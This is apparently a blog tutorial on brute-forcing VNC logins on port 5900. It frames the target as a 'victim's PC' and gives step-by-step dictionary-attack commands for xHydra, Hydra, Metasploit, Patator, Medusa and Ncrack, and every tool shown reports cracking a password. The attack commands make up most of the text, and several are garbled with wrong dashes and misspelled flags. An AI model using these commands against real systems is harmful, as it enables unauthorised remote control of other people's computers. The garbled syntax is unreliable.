In this article, we will learn how to gain control over
our victim’s PC through 5900 Port use for VNC service. There are various ways
to do it and let take time and learn all those because different circumstances
call for different measure.
Let’s
starts!!
xHydra
This is the graphical version to apply dictionary attack via 5900
port to hack a system. For this method to work:
Enter xHydra in your kali Linux terminal.
And select Single Target option and their
give the IP of your victim PC. And select VNC in
box against Protocol option and give the port
number 5900 against the port
option
Now, go to Passwords tab and select Password List and
give the path of your text file, which contains all the passwords, in the box adjacent
to it.
After doing this, go to Start tab and click on Start button
on the left.
Now, the process of dictionary attack will start. Thus,
you will attain the username and password of your victim.
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary
attacks against more than 50 protocols, including telnet, vnc, http, https,
smb, several databases, and much more
Now, we need to choose a wordlist. As with any dictionary attack,
the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
Hydra-s 5900 –P
/root/Desktop/pass.txt –t 16 192.168.0.6 vnc
-P: denotes
path for password list
-s: denote
destination port number
-t: Run TASKS
number of connects in parallel
Once the commands are executed it will start applying the
dictionary attack and so you will have the right password in no time. As you
can observe that we had successfully grabbed the VNC password as 098765
Metasploit
This module will test a VNC server on a range of
machines and report successful logins. Currently it supports RFB protocol
version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication
method.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
Awesome!! From given below image you can observe the same password:
098765 have been found by metasploit
Patator
Patator is a
multi-purpose brute-forcer, with a modular design and a flexible usage. It is
quite useful for making brute force attack on several ports such as VNC, HTTP,
SMB and etc.
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t
1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0
From given below image you can observe that the process
of dictionary attack starts and thus, you will attain the password of your
victim.
Medusa
Medusa is intended to be a speedy, massively parallel,
modular, login brute-forcer. It supports many protocols: AFP, CVS, VNC, HTTP,
IMAP, rlogin, SSH, Subversion, and VNC to name a few
Run the following command
Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt
–M vnc
Here
-u: denotes username
-P: denotes path for password list
As you can observe that we had successfully grabbed the VNC
password as 098765.
Ncrack
Ncrack is a high-speed network authentication cracking
tool. It was built to help companies secure their networks by proactively
testing all their hosts and networking devices for poor passwords.
Run the following command
ncrack –v –U
/root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900
Here
-U: denotes path for username list
-P: denotes path for password list
As you can observe that we had successfully grabbed the vnc
password as 098765.
0 comments:
Post a Comment